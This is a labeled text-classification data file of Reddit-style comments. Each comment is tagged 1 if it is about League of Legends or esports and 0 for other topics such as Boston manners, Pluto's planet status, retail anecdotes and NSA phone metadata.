0	People often say we're not friendly in Boston but I disagree. It's just got to be a really honest form of friendliness.  It's not based on shallow courtesy and meaningless greetings.  If you pick up a paper in the corner store and the headline is about the sox, and other people are there, someone will just blurt out some rude comment about how the "fuckin sox had a shit game (bla bla bla)" and people just start talking who don't know each other.  From what I hear It's hard getting used to cuz most of the country has this phony friendliness but when it comes down to it, they're unconfortable with really having a conversation with strangers and only want the formalities; "crazy weather huh?" "how are you" "have a good day"
0	Just so you know, there are likely hundreds of objects around the same size as Pluto in our solar system.   There are only eight that are at least as large as Mercury, and which have cleared their orbits (ie, are more massive than the sum of every other object in their path).   So we can have hundreds of "planets", or we can have eight as well as hundreds of "dwarf planets". It's all a matter of semantics...   The Sun and Moon used to be planets, and Earth didn't. Then Ceres, Pallas, Vesta, etc. were all planets, now they're "minor planets" (the original term for asteroids and suchlike). Actually, that case mirrors what's happening now, so if you have a problem with scientists changing the definition of a planet, you really ought to be defending the honor of the 570,000 known minor planets as well as the five confirmed dwarfs.   Also: "In the 17th century, references were made to the continents (or mainlands) of Isle of Man, Ireland and Wales and in 1745 to Sumatra." (wiki)
1	Vayne . People say she's weak early game. She's  fragile  early game, but she still has an above-average damage output. I'm convinced that Vayne players are behind the myth that she's weak and easily ganked, because every time she's in a game both junglers spend a lot of time bot. She has tons of outplay potential, and she only needs to be better than one or two players on our team to get fed off them. When I'm winning the lane her jungler comes to help, she flash-stuns my support for an easy kill, I get dived 3v1, and they take bot turret and dragon. When I'm losing the lane our jungler comes to help, gets between Vayne and a wall, and feeds her double buffs (sometimes she keeps going, gets the double or triple, and proceeds to take tower and dragon). When the lane's even, she lets us take tower and afk farms while everyone else groups mid - until my team decides she needs to die and sends two or three people to kill her. This inevitably results in at least one kill for her, more if she sticks around after the first. Even if we succeed in killing her, she ends up with more gold, and that's not even considering all the minions she farmed before we got there. If she understands how to play the champion, she  will  get fed one way or another.   If I'm playing jungle or a solo lane, I'll try to help. I'll take Teleport, roam, gank, do anything I can to shut her down. Doesn't matter. I've seen a 0/8 Vayne win a 1v2 against a well-farmed Lissandra and a Riven with double-digit kills. I've only ever won two games against Vayne; one was a blind pick game where both teams had Vayne and ours got 10 kills in lane, the other was against a first-time Vayne with AP runes/masteries that started boots 3, used E on cooldown to harass in lane, and had an Alistar support who failed every single W-Q combo.
1	just a question for OP about my scenario i hate supporting, but i've played it 8 times in ranked, currently 1-7 as support.  I'm in plat 3 atm, but i think my supp is closer to bronze. Does that mean i shouldn't queue for ranked? if i get support it's almost certainly going to be a defeat because i'm REALLY bad, doesn't mean i'm not doing my best.
0	Then you should bring up the topic/points that you want to discuss. Don't ask a question that has a defined answer and that has been addressed in multiple forums and expect 40 pages of in depth discussion. That's not how people operate.   You can't expect people to know what you're thinking. If you want to talk about the theoretical limitations of a microscope, you don't initiate the conversation by asking "What do you call the little piece that goes over a microscope slide?" (It's a cover slip by the way. Had someone ask that the other day.) and then hope someone elaborates on it.
1	I'm assuming when you said "I've started playing DOTA ever since they added the Australian server" you're learning the game from scratch.     The ping difference is massive. If you haven't noticed it, it's probably due to the turnrates and attack/spell animations that Dota has.     Dodging spells is a lot easier. e.g. Storm Spirit balling around to dodge spells. These things can change the game.       and in response to your
0	I worked in retail previously (name omitted for legal reasons) and did call a customer one on my last day essentially.  I was working a location where everyone called off frequently, so I was covering all the departments except jewelry, pharmacy, and front register.  Lines 1-4 on the phone were for departments I was covering.  My two weeks notice had expired 45 minutes before and my replacement was running late.   Some person outside in electronics kept hitting the button for help, but I had a line in Lay Away plus the phones.   Eventually the woman in electronics storms into Lay Away, walks past the line, "You need to come help me."   "Ma'am, these people were here first."   "You can't f***ing tell me there's no one else in this store who can't run the Lay Away."   "Ma'am, there's no one else in this store right now who is trained to run this Lay Away."   "Bullshit.  You stop helping this bitch" she motions at my first customer, "and get out there if you want me to spend any damn money in your damn store."   I just stared at her, "Ma'am, I stopped working here 45 minutes ago and I don't give a damn if you spend money in this store."  Turned to the insulted customer, "I'm sorry she was so rude to you, I'll be right back with your things."   Five minutes later I found all the stuff and took it back down to find my one-hour-late replacement standing down there with a manager and the woman I'd offended.   "[Talsiran] did you cuss at this woman?"   "Only to tell her I didn't give a damn about her money while she was cursing at my customers and myself."   Customers backed me up, she was asked to leave the store, replacement clocked in to his fresh Hell, and I was told I'd never be rehired there again.
1	The soraka nerfs are just stupid let me explain why:     Soraka support is extremely weak. She has no escapes, no cc. Want to make a play? It's almost only possible to bait your opponents in a trade they are going to lose. If they back up, nothing you can do. She has good sustain in lane, but her heal is on a pretty long cd, and mana is not used by many Adc's.     AP Soraka mid/top; I like playing soraka mid so much, I think it's a really strong champion, making some nerfs neccesary? No. She has some strong weaknesses, if you dont exploit those, you deserve to be punished for it. Like I said before she has no escapes and cc, so camping her should result in plenty of kills. Literally all you can do against a gank is running back. Her pushing is really strong but can also have a downside, pushing your lane makes you more vulnerable to ganks, which she can barely escape. Other champions have good waveclear too (kayle, does she need a nerf? no.) I like the idea of giving her E manacost, since I don't really see why harassing ur opponent shouldn't cost mana. But nerfing her Q damage is just stupid and not the solution. I think a better solution to her pushing power is making it so that her starcall (Q) can only hit 3 minions/monsters max. This way she loses plenty of pushing power without making her weak in teamfights, since she can starcall 5 enemies.
0	Any girl with a sister has a 50/50 chance of being the less attractive one one.   If you get a hot girlfriend, chances are her sister will be too. If the sister is hotter, its likely something your girlfriend knows and has been insecure about for her  entire life .   Besides that, there's more to what makes a good partner than pure physical attractiveness. A person's personality is completely independent of their level of attractiveness. Maybe the sister is hotter, but the girlfriend might have more common interests with you and be a better person. Then again she might not be.   M point is, yeah, you can say "Oh I should have kept it to myself."   But honestly... If you hadn't been thinking like a shallow asshole, the thought wouldn't have occurred to you in the first place.   I'm not saying you shouldn't notice that the sister is hotter. But to even think "I guess I picked the wrong sister." shows that you have a lot of growing up to do. It also makes it look like you felt like you were just settling for this girl in the first place.
0	Fancy graphical covers are a recent phenomenon. Typically, it's still merely the dust cover that has all the graphics and quotes. The actual bound hardcover book is still a drab affair, hardly an opportunity to properly represent all that is contained within.   In fact, even the glitzy dustcovers cannot be trusted, as the are almost always controlled by the publisher, not the author. This makes the old cliche even more true, today. Oh, best seller, greatest novel ever? Yeah right, never judge a book...   So the covers of books are designed to sell books, not accurately represent them, if there is a conflict. Eteeen the two. If not, bookcovers fell into conformity, designed to look good on the shelf, fitting in well among all the rest, like the wall of a lawyers office.
0	This meme has been brought to you by WALL-O-TEXT™ and
1	this might be lost amid the scuffle, but there  are  champs i know to use that i do not own. to be fair i am not an expert with them, but i am efficient enough. for example: i played a jungle Nocturne in ranked today and did pretty fucking well and we won.
1	i'm reading some of your responses to the answers people are giving... are you really asking for help or do you just want to troll these people.   > i'm giving credit to most that responded: it's random. people will pick top picks.   i'll assume you actually want help.   even if you do that (picking strong picks), however, it doesn't mean that you wont' be "outpicked".   try taking down how many times you  actually  get counterpicked.  is it truely 100% of the time? or is it more like you notice yourself getting counterpicked 100% of the time and you pass off not getting counterpicked as trivial.   now, cassi is a pretty commonly acknowledged "counter" to ryze mid.  but that doesn't mean that you can't play that match up.  remember getting counter picked might be a good thing if your synergy with your team is better.  that will trump the bad match up.   ask for ganks if you need.  if the enemy feel like their getting camped, the match up will now be even if not in your advantage.
0	Semi-Related Story:   I used to work as at the Customer Service Desk in a grocery store. One day, a person calls customer service and asks for the phone number to the bank that is inside our store. I don't know what it is, so I walk over to the bank and ask the attractive teller what the phone number is. Apparently, I was vague in how I asked, because she starts writing her personal phone number and asks me why I want it (didn't realize this until after), to which I respond "Oh, a customer called CS and wants to know". She gets extremely flustered, turns bright red, and just said "oh" in the most sheepish voice ever, and re-writes the banks number on a new piece of paper.   My girlfriend at the time, who was a cashier, happened to be walking by the bank and heard part of the conversation and I told her the story later that day. From then on, she would always make sure to hug or kiss me in front of the teller.
1	Well, it's a partial solution anyway. The problem, as it was described, is that you CAN NOT laugh in their face without being punished for it. The fan base aside, you WILL play with the man in so many other games, therefore it's very easy for him to drag you down with him. It should be teamplay afterall, so one person intentionally feeding can ruin the game no matter how hard you try (and the rest of the team). I know he had X mostly as an enemy, but there is not so many players to pick from, so there's a good chance he will have him on his team.
0	I once called a dead co-workers voicemail so i could hear the voice of a serial killer. Turns out he was a rapist/ serial killer police had been looking for. He took himself out when the police questioned him. We worked the help desk call center.
0	I recently transitioned from a school that is designed for kids with emotional issues.  There was a set of rules that are meant for different kinds of people, like for example, drawing on yourself is a nono, so is having a pen.  Me and my friend joke about it being prison, and, well, after watching prision documentaries............   no but seriously, there's even "quiet rooms" (broom closets) they throw your ass in if you do so much as disobey the advice of a teacher (no matter how bullshit their request is). There was a kid who didn't really like anything the teachers instructed him to do, and he would decline being forced to do something "retarded and gay" that was really something like stop talking over a teacher. i can't put a number on the amount of times he's been in the box of doom.
0	Thanks for the
1	I assume this is an AP interpretation of Doran's Blade. The problem with this is that the spellvamp would require repeated spell usage to take advantage of it, causing mana problems and a 3% spellvamp is hardly noticeable at early levels. Higher values of spellvamp would make it an alternative to a hextech revolver, but would have balancing issues on manaless casters (mainly vlad).   Lifesteal is different in that it does not require any resources to utilize it, nothing but smart autoattacking and lane control.
0	That energy isn't lost, and just because time ages you doesn't make it an uphill battle until you keel over until you die.  This energy expenditure can lead to improvement and skills and all sorts of wonderful crap.  Looking at having to do something that isn't entertaining you as a loss isn't a great or sensible attitude to have.  It's great that you don't look at this stuff and think "fuck it", but feeling sorry for yourself is a downward spiral.  And yes, beating yourself up all the time and not working to improve it is just like that.   Sorry if I sounded like sanctimonious jerkoff, I'm in the same boat as you.   You could do worse but you could do better as well.  Self-discipline is something you can learn over time.
1	In my case, I quitted Lol mid season2 at around ~1400 elo i think (silver 2 icon and silver portrait). From times to times I would play some occassional aram custom games, and when by the time they introduced the soloq aram, I started playing Lol again full time, but avoiding ranked (and summoners rift in general).   So a very good friend of mine, who was gold2 in early s3 but quitted the game started playing again. He was dropped to Silver2 or 3 by then,so he wanted to get Gold again for the rewards, but after failing Gold5 promos 4 or 5 times he asked me to help him.   The strategy we had was to get duo bot with Leona as support. The reason was to play aggresive, destroy enemy support and if not kill, at least prevent enemy ADC from farming. This would bring frustration to enemy team, with a weak ADC, flamming his support and/or jungler for not ganking (hehe). So after my placement matches I got placed in Gold4, and he got to his promo matches.
1	I know exactly how you feel. After 2 heart attacks before I hit 23 (perfectly in shape, just odd heart defects) I've used LoL as an out for many things. Now I've taken all that I can and all the good things it's given me and tried to give back with my youtube channel. Granted it's nothing much and will most likely never break out, but it lets me do 3 things I love in one:     Play LoL     Teach (I'm a coach IRL and working on being a teacher)     Help people
1	E, 2 hard cc's? Really now? Her e is completely avoidable by just not standing near a wall wow what hard counterplay, the only part of her e that could be considered op would be the fact that it overrides some champs dashes, such as fizz q, and doing that requires some amount of mechanics. Only counter play is hard cc, really? Or you know you could just burst her hard or play any early game adc and shit on her in lane and carry the game.
0	I actually think WebMD is brilliant if you aren't a hypochondriac.   My mom hates Drs and will do everything in her power to avoid seeing one. In 2009 she was experiencing some odd symptoms so she looked at WebMD, which returned cervical cancer as the most likely cause. Turns out WebMD was correct as my mother was diagnosed with cervical cancer just a week later. She was able to get a hysterectomy and has been cancer-free for 4 years.   This past year, WebMD helped me, as well. I was having sex and all of a sudden I ha an excruciating pain in my head. It was like a headache that went from not existing to vein the most pain I've ever felt in my entire life in about a span of 3 seconds and only last 10-20 seconds. According to WebMD, I experienced a "thunderclap headache". One CT scan and lumbar puncture later and I'm healthy and alive :P
0	My girlfriend's family is in this situation.   They are in the process of adopting a girl that was like her second or third cousin once removed or something. The problem is that the mother was a user, and wasn't in the highest mental state in the first place, to the point of harming herself and being institutionalized. Due to the fact that SO's mother is the "legal" guardian of the biological mother CPS asked if the child could stay with her family until they found somewhere for her to go. They decided to adopt her.   So essentially it is just decided at the time. In this case it seems that it would be best to remove the kids from OP's example from the situation. There would be a period to get the children back if granted by courts. In my SO's case it was fine because of the family and geographical difference from the biological mother.
0	Oh that's nothing!   My mom and scumbag soon-to-be-ex-step dad were trying for months to sort out responsibilities and ownerships with the debt and personal possessions. Because he was a big baby, he would never meet her in person. When they tried meeting over coffee, he immediately exclaimed "I can't do this!", left, and texted her. So one day she cornered him in his office to finally get some things straightened out. He was very calm and willing to take over the house and it's debt. As this was very abnormal behavior, my mom was curious as to his reasoning. He said "Well you're having surgery soon, right? (she had a hysterectomy) Well if anything goes wrong, the house is paid off in full and I can live there for free!" 8 years of marriage, he cheats on her, and now wants her to die to live mortgage free? Fuck him.
1	Hey guys, another post saying Bronze is utter trash and how gold is heaven!   Also, as a Bronze 3 player, I'd like to say that OP's oppinion on Bronze, I can't confirm for the rest, is slightly biased.   He pictures most of the bronze players as the "Stereotypical Baddie". Not everyone in Bronze is like that. Like in every tier, there are more and less talented player. The "Worse" one is often considered as the majority since we hear them more. There are players in bronze who do not have horrible mechanics and objective prioritization like you say everyone there is. Most of the time, when a team loses, it's because the team won't act like one, and the team will not try to support the weak link.   Yes, there are vision and CS problems and other mechanics that are less developped, OP is right on that  point, but some are just irrelevant. As for an example, builds. Not everyone has poor/horrible building skills. Most players don't, actually. It's only because players see it once that they assume everyone in bronze is horrible.   The godlike champions are, indeed, often picked or banned, but that is for a simple reason. Players can't deal with them, and have no way to know what are the ennemies best champions. Thus, they just go with what they can't handle, which are the "Godlike Champions". While you cannot, in other leagues, know your enniemies strong picks, you know how to handle these champs, and thus, ban who you do not want to have the trouble to deal with. If there is a problem with Bronze, it mostly is that players cannot handle Fight-Changing/Heavy-CC champions, such as Amumu, Blitz, Shen, Malphite and, to a lesser extent, Thresh.   PS: I am not saying that I am an amazing Bronzie that is out of the leage or something, because I do know that, if I'm in bronze, it is for a reasone. I do realize that my mechanics are bad, and well, yes, I cannot handle the "Godly Champs". My point is just that, even with what OP says, Bronze is NOT filled with horrible flamers. Actually, they usually consist a fifth of the team. The fact that they are there and yelling just makes it more notcieable. And well, for those tha complain that their teams suck and everything, Mathematically wise, the ennemy has more chances of having shitty player than your team. In fact, you matched teammates represent 44% of the game, excluding you, while the ennemy team is at 56%, and thus, have a greater possibility of having the weak link. If anything, you should win more games because of weaklings than you should loose... UNLESS YOU ARE THE WEAKLING.
1	I think these are some great points and look really in the long run rather than the short. I think another reason to wait maybe a year to make the groups larger is because this allows more of the top players that are still 16 to get better and then we can add them to the scene. The one thing I have noticed with the changes for OGN from, 12-16 teams in the last year, is that there is still quite a large divide among the new teams each split and the more experienced. Both MKZ and BFM went 0-6 this split and had a combined 3 or 4 "close" match-ups.
1	We ask a lot of players but some of them are just not comfortable doing it or it turns out they don't fare so well at the desk -
0	It's amazing to be how many people--especially Reddit--are understanding this wrong.   First off, I still think everything that the government is doing is wrong, and I think it should change. Also, it's not Verizon's fault (court order and all that, and they weren't allowed to talk about it) and the chance that the only carrier affected is Verizon is practically zero.   But let's be realistic about exactly what the government is doing. They aren't listening in to phone calls or downloading your dick pics.   The only information in question right now is the exact same thing you see on your bill every month (or can see online, anyway): when and where you make calls.  Your phone company already has this information.  They  have  to since, you know, that's how they draw up your bill. So there shouldn't be any outrage at the phone companies, since they've been doing that since phone service has been invented.   Of course, what the government is doing is now taking and housing this data, and them combing through it looking for patterns--and, of course, they'll have easy, ready access to it when an actual crime is committed. This, of course, isn't right; they should need a warrant to gather this information. But visions of a hundred NSA agents in suits flipping through your account is not correct.   A lot of people are complaining that your information shouldn't be collected, but that's not the issue: of  course  your information is collected, because the company has to in order to function as a business. (and, heck, I'm not opposed to the company retaining the info just in case the government  does  need it, so long as they get a warrant. I think that's reasonable.) But people need to realize that it's just the metadata, not the specific content of your communications, that is in question here.   People should be outraged, but please make sure you're outraged about the right thing. A lot of people, especially the knee-jerk absolutists here in Reddit, aren't quite grasping that.   More info:
0	Right, stories are for paragraphs and
0	in case OP does not know, Heimerdinger is a character in League of Legends and of the different emote sayings each player has, one of Heimer's emotes is that exact joke in OP's post.
1	HE WAS GIVEN THE ULTIMATUM. EITHER BACKDOOR NEXUSES OR BACKDOOR SJOKZ, TEEMO LORD SATAN ONLY GAVE HIM ONE CHOICE!
1	Gold level adc here - i believe my mechanics are far superior than my knowledge.   Here's what I can suggest..     CS is important     Do not get hit by skillshots - you should always be in position to dodge whatever skill is coming your way, be it an Ahri charm or Naut grab. Try to dodge one more gamechanging skillshot every game.     Know how dangerous each enemy champion is. If they are full of short range tanks like Renekton, you have a bit more leeway in positioning, but if they have something like jungle Kha and Akali mid, make sure you see them engage on your team first before going in.     Know the cooldowns and range of each champion's spells. This is a lot more about feel than actual knowledge, since in team fights there's realistically no way for you to be counting the seconds before Shen's taunt comes back up. This is similar to the last point.. and the earlier point as well.
0	I have a very similar situation going on right now (which is thankfully drawing to a conclusion next month).  Lifelong friend finally starts dating this girl that I guess has beef with the world and comes to our house to "get away from her troubles." Well she must have been pretty god damn carefree because honest to god she maybe left my house for a total of 10 hours over the span of 3 months or so. She would stay when he went to work, go to her classes every so often, and then spend the rest of the day at our house by herself. She would even stay there when he would go out of town. Fucking creepy.  After a few months of her living there more than anyone actually paying to be there, my other roommate and I confronted them about her officially moving into our house from hers (where she was paying full rent and utilities) and picking up some utilities since she was a net drain on our income. Big mistake. She flips shit, starts crying, refuses to discuss it at all (she is in law school btw, bright future there), says she can't pay anything, drags my friend out without letting him discuss it with us, and flees to her house for 2 solid days. Best. Days. Ever.  They finally come crawling back acting like nothing ever happened, but at this point the alliance between my other roommate and myself was set, and we kept the matter pressed.  Final solution was that they wouldn't pay rent for her but her time at our house is very limited.
1	Remember that Singed was the first champion in league so you shouldn't be comparing him to champions released today that are much more planned out and thought out. But I have to disagree with you, singed has a very weak laning phase except you're extremely good with him or your opponent doesn't know how to play vs singed, like you said, you've had top laners that have demolished him. Why? Because he's weak in every aspect early game, so complaining about him scaling well with items and being strong late just makes no sense. Weak early game should equal strong late game and singed is a prime example of that. But what you can complain about are the items Singed can itemize for, there are so many items that give you mana + a lot of free stats which is pretty much exactly what singed wants f.e. Frozen Heart.   It's similar logic to the next champion Lucifer, he has no cc and is squishy and medeocer range, what is he rewarded with? A lot of damage and mobility. There always must con for every pro, and that's why Irelia was so op, she had everything which meant just about no flaws. And she still is really strong, having a bit of everything is really messed up.
1	I felt that one if the biggest reasons TSM lost was because they didn't have enough damage. The only damage they had were Turtle and Bjerg(which was behind). dig had 4/5 champs that did crazy amounts of damage.
0	Protip: go to a thrift shop and get either a navy or charcoal suit. Black belt and shoes. Bam. Formal wear.  A dark blazer and match the pants as best you can if you must.   Provided you don't gain a lot of weight you can wear the damn thing forever.
1	The other day I finally got fed up with trolls/feeders/leavers after losing about 100 ELO in one day and thought "I should make a program that grabs their champ stats and wins/losses so I can see ahead of time if they're terrible people or not." (yes, you can do it on lolking, but it's slow and not all together)   I happened to stumble across  in my travels and it's quite amazing the difference it's made.   That guy that autolocks Cait and insists he's really good? Oh look....he's 2/20 with Cait with terrible CS.   The person who humbly offers support? They're 9/40 overall. Likely not the best "support" so to speak.   Now do these stats mean that you're 100% going to lose the game if you play with them? No. But it gives you information so you can make a decision if you really want to play with these people.
1	It's interesting because both Piglet and Bjergsen got a circlejerk fan base.  It was a nice play but the reaction would be different if either off them made this play on them vs a random challenger player.   When Bjergsen and Piglet makes plays it's because they're Gods and they outplayed the enemy.   When they get outplayed however people tend to discredit the person that outplayed them and come up with reasons for why the play wasn't that good.  "Bad match up", poor itemization, lvl difference etc.  The list goes on.   Now whenever Bjergsen, Piglet and other circlejerk pro players do something against a random you will rarely see people try to discredit them.  You never hear people say "That guy misplayed it so hard, that's why Bjergsen was able to get the kill etc".
1	There are two modes: 5v5 and 3v3; 5v5 being the dominant one (3v3 wasn't there originally and 5v5 is, in general favored).   There are three lanes that spawn minions and a jungle in between with neutral monsters.   You control a champion that has 4 spells, one of which is an ultimate that cannot be used until level 6, and a passive. Each champion (there are 81) has 4 unique spells and passives; however, despite which champion you are playing, you get 2 spells that you choose before and you can pick despite which champion you play. Ghost allows you to run fast for an amount of time, Ignite deals true damage based on your level and cuts down healing effects by 50%, Exhaust makes the target move slower and do significantly less damage, etc.   The goal of the game, ultimately, is to destroy the enemy nexus. How this is achieved is killing 1 or more inhibitors in each lane (one per lane guarded by 3 turrets, only one required to win), which allows for the turrets guarding the Nexus to be attacked and then allows for the Nexus to be destroyed.   There are a lot of other elements to the game. There are buffs (red buff  makes your auto attack deal "true damage" (ignores armor and MR, does the damage that it says), more damage per your level, and slows, blue buff gives you mana and energy regeneration and cool down reduction) that are obtained from killing the neutral monster that holds it, global objectives (killing Dragon gives each person on your team Gold,  killing Baron gives each person on your team more Gold, experience, and a buff), and more.   Each champion also has it's own unique play style and role. For example,  Annie is a burst caster meaning that she can do a lot of damage in a short amount of time but has to wait for cool downs before doing any more damage. And, since her damage is mostly from spells, she itemizes Ability Power to hit higher. Amumu is a tank who has great initiation. Ashe is an AD (attack damage) carry whose damage comes mostly from her auto attack, therefore buying AD makes her hit higher, but also benefits from crit chance, life steal, and attack speed.   In general, the game has many elements and in order to be good at the game you have to understand these elements and use the knowledge to your advantage. It's also tons of fun to play and I would definitely recommend it to anybody and everybody. It's kind of like Nexus Wars, in a way.
0	I am average looking...but as the more attractive one amongst my siblings, it's also sucks when people are constantly pointing it out especially in front of my siblings. I wince everytime and do not enjoy the compliment.   One one hand I don't want my siblings to feel self conscious about their looks. Or feel like constantly in someone else's shadow over something so superficial.   Plus I don't want to be objectified.   Don't get me wrong; I'm grateful for what I have, but c'mon people use your common sense.
0	Yeah I wish people knew how to deal with it better. My moms friend was pregnant when I was about 8 years old and I remembered her telling us about it when I saw her at one point probably a few months along, and I asked her how she was doing and she got really offended and started tearing up and told said "Actually I just miscarried and I've been having a rough time, so thanks for bringing that up again." Which wasn't too bad but then ever since then, and I'm 23 now, she tells the story to people like I had found out and asked her just to make her depressed.
0	Good management would be able to see if people were abusing the "left out food rule".  Good management would realize working at a steak and shake isn't most people's "dream job".  They'd also understand that a little free snack that was getting thrown out any way would be a decent treat for the employees.   Now if the manager began to notice more "mistakes" being made and employees were getting a 3 course meal in the matter of a few hours then the manager could put an end to the "snack on old food rule".  Also on a side note Fuck you Andy!!
1	I hit this about 3 or 4 weeks ago.  Was about to hit my promotion series for gold. when I had 4 losses in a row of trolls, cry babies who didn't get the role they called, etc. I knew I should have walked away but I didn't.  My wife gave me the weekend to play non stop and I wasn't going to just stop playing. And my goal was to get to gold.   I grabbed a beer and kept going.   Another troll game. In my head I'm thinking it will balance itself out.   More losses dropped a tier. Another beer. 2 more losses another tier. This was at the worst point. Now I'm doing everything i can to carry the team. So overextending to get more farm etc. Stupid mistakes I know are wrong but at this point I needed the extra edge to carry.   Now I'm just irritated with the whole system. Another beer.  Dropped all the way to silver 4. My mmr is so screwed from that drunk fest weekend i can't climb back out. I will go on a 10 win streak and get to promotion series to silver 3 and riot will put me with bronze 3 players and we didn't have a chance from the get go.   What did I learn from this? That I don't care anymore. I have every champion, half the skins that are out there. I can play every roll no problem. This experience has actually made me not rage anymore.  I go in and make sure I win my lane and do the things that I can control. I take 5 to 10 min after a game to reflect what I could improve on. And at this point it is the little things. Whether it is timing on drag or enemy blue - to positioning myself better in a particular team fight. I'm am beginning to think duo queuing is really the only best option. But I really don't know. I have played this game since beta and it truly is a great game.  If someone messes up. I don't even give advise anymore. People take offence to it and more mistakes will happen. There are many posts like this and really it isn't for the community to read. But for the OP to have that gateway to self reflect. Which is a great way to get on the right path. Hitting rock bottom was probably the best thing for me as a gamer :)
0	last time it happened to me I woke up, looked like someone had forgot to open the lid before puking, it was EVERYWHERE, on the wall, behind the toilet, on the other wall, in all the cracks of the toilet(screws for the seat, between tank and bowl), all over the cleaning wand thing (lol) all over the toilet cleaner bottle (lol)... didn't remember if it was me so I cleaned it up. 2 days later roommate says it was her friend, sucks because i don't like her friend...
1	This is amazing. but, I think I know, but what does
0	If I were a feminist.   I would campaign against female only gyms and female only sections in gyms. If I wasn't seen to be promoting equality even when it didn't benefit me then I wouldn't have any credibility.   I would confront my employer about their female mentor ship program and goal to have a certain percentage of women on the board in 5 years as it's discriminatory and will result in the best candidate not being given the job. Something that I'm strongly opposed to.   I would accept that young people are quite often stupid and do stupid things like get drunk and have sex that they regret later. That's not rape it's called growing up.   I think if I did all this then when I say things like 'Hey why do women get paid less for doing the same job?' then I might get listened to.
0	it's probably not much consolation to those shorter, but we tall people feel really terrible at concerts/shows - while we are not going to stand in the back (because i mean, imagine standing in the back, but say, i gave you a step ladder and raised you up about a foot, yes, the view is fine, but the experience is lessened, you must know that it's not ideal) yelling at us won't solve anything - it makes everyone more uncomfortable, and often all it takes is a little friendly tap on the shoulder and we'll gladly accomodate those most impaired/affected - it's also more fun to be surrounded by other people, experiencing the movement of the crowd; regrettably, in order to do so, we talls gotta stand somewhere amidst the mass, and believe me, we are aware of how aware of us you are - my social anxiety is through the roof at shows in smaller venues because while i know im not the center of anyone's attention, i also know that im a little more noticeable and 100% in someone's way if i even so much as step foot into the crowd - outside of standing, sitting sometimes for conferences or events, the chairs can be aligned in a way that makes it impossible for us to not block the people behind us, and we have to slouch to make sure our heads and shoulders don't block everything
1	I agree, he is not balanced enough. His E is too good for too many things; I mean really? Of all his spells, it has the highest damage, is aoe, has a slow, does the untargetable thing, and just outclasses his Q and W by so much, and ofcouse, there is also the fact that you go from 20 sek cd to 8, making him impossible to gank and very hard to catch out, whilst not missing out on damage...   I really want Riot to switch his damage from E to Q, and add the lucian Q mechanic to Fizz Q (it just feels wrong to die from not getting hit)...
1	Oh Sorry, i wasn't reading well.  There is no real
0	I bought tires there three or so years ago.   This winter I got a flat and took it in to get it patched up.   Turns out the tire was ruined.   It was under warrantee, but they didn't carry the same model anymore.    And you can't throw new, different-model tires in  with the other 3 tires on an all wheel drive vehicle.   So, they replaced all 4 tires with different, better tires for the $35 difference in price in the one old tire that needed to be replaced and the new tire.   4 new tires for $35.   And they didn't have my size on hand, so they rush ordered them for the next day at no additional charge.
1	Without paying hundreds of dollars, it would take literally thousands of games to have a champion pool prepared for shifting meta and rune trends, especially considering a good chunk of top tier champs are 4800-6300 IP.   Literally every league player who is concerned about things like the "shifting meta" has already played thousands of games.   The game is not designed to be streamlined for smurf accounts. The game is streamlined to incentivize new players into buying cheap "tutorial" champions and later specializing when they've found a niche they like.   The slow IP progression is also designed to cause a system of renewing excitement for accomplished players. If IP was too easy to accumulate, purchasing new champions would not be that interesting or monumental.   Finally, you're not supposed to ever grind - that's counterproductive to a positive gameplay environment. You're supposed to play for fun (gasp!) while seamlessly expanding on your toolset as you gain skill.
1	Top lane Kha'Zix plays similar to an assassin Rengar, although I don't know how effective it is after all the Q nerfs and the ult nerf. Full damage Xin Zhao works similarly damage-wise and with the fact they both have really safe engages with Rengar's jump and Xin Zhao's jump both being point and click, but Xin is much shorter range with his engage. You could try Talon top lane, it's really weak in lane but outside of lane it does pretty much the same thing as Rengar. Damage Lee Sin and Riven both also blow up squishies, but both of them don't have the reliable engages like Xin or Rengar. Akali is also really bursty and has a safe engage, but again her laning phase is pretty weak. Feel free to add me in game if you want, I love talking theorycraft and the like. IGN is UnheardMarksman.
0	I can confirm this. I'm friends with this girl who I never saw in a sexual light until one day when she wore this skinny purple dress. As soon as I saw her, my brain was like "DAMN! WHERE THE FUCK DID SHE COME FROM?" After that, I put her out of my mind because I never thought she'd go for me, until both of our friends mentioned we'd make a good couple. We joked about it, but I still didn't make a move. Months later I found out that she had liked me, but it was too late now. She is currently tormenting me through my insomnia.
0	the problem here is, that Pluto was already considered a planet, under the old definition. The Astronomers felt embarrassed by the fact that there are so many other planets. fine. that doesn't mean that Pluto isn't a planet;  they never discovered anything new about Pluto to change its status,  they simply redefined the word. they discovered nothing new. Pluto is still the same as before. AFAIC, it's still a planet, and they're just butthurt about embarrassing themselves. they moved the goalposts after Pluto already won the game. that's their problem. science is only supposed to change its conclusions based on newly discovered information. that did not happen. nothign new was discovered about Pluto. they just changed their minds about the definition of a word, which really isn't as simple as voting.
0	I frequently struggle with this because I adore kids but I had someone close to me incarcerated for a false accusation by someone with a better lawyer (I was literally there at each of the accusing dates and never saw anything of the sort not did several of the other people I had over who were never called to witness).   But as a result of this, I don't have much to deal with anyone's kids ever whereas I used to love playing peekaboo and making faces at babies to make them laugh. It's just sad that people have to always assume the worst or that people can be so horrible as to accuse you of wanting to hurt their children just for waving or making faces while waiting in line at a grocery store or in a restaurant. :/   Edit: Since so many are asking for the details t was basically a family member made accusations of my grandpa,  whom cared financially for my family since my mom can't work, molesting him. The supposed nights this happened my brother and I were always in the room and usually with friends over (we used to "camp out" on his floor because he'd let us sty up late playing Pokemon and my room was next to my parents). On one night that the family member claimed my grandpa wasn't even home. But our lawyer never asked any of those questions. He never interviewed or asked witness of any of my or my brothers friends, and as a result my grandpa has been in there for about 5 years now because getting an appeal or a new judge blows.   To further add to it, the prosecuting attorney has long since been disbarred for blackmailing and threatening judges to get favorable rulings. So all his cases have been reopened but there's so many of them that without the rush of an appeal my grandpas may not be for another 5 years. :/   It's been rough and my family has lost and had to do without a lot because he was a veteran since the age of 17, so he had quite the retirement fund and pension and yeah...   As for WHY the accusations were made we can only speculate but the family member who did it has been caught on multiple occasions molesting his younger siblings. Their family recently reconnected with a woman whom my part of the family banned from our lives due to stealing from us for crack money and we suspect she never got over it, caught my family member diddling his sibling(s) and asked if "grandpa showed him tht" and the idiot, seeing a way out scot-free said "yes."   So five years later, my grandpa (an innocent man) is in jail while the family member continues to walk around free. He constantly lies last I heard and has three illegitimate kids at the ripe old age of 18 and had been kicked out of two schools for sexual harassment. It's not fair, but unfortunately my family is still in a bit of a monetary bind so were powerless to really do anything. :/
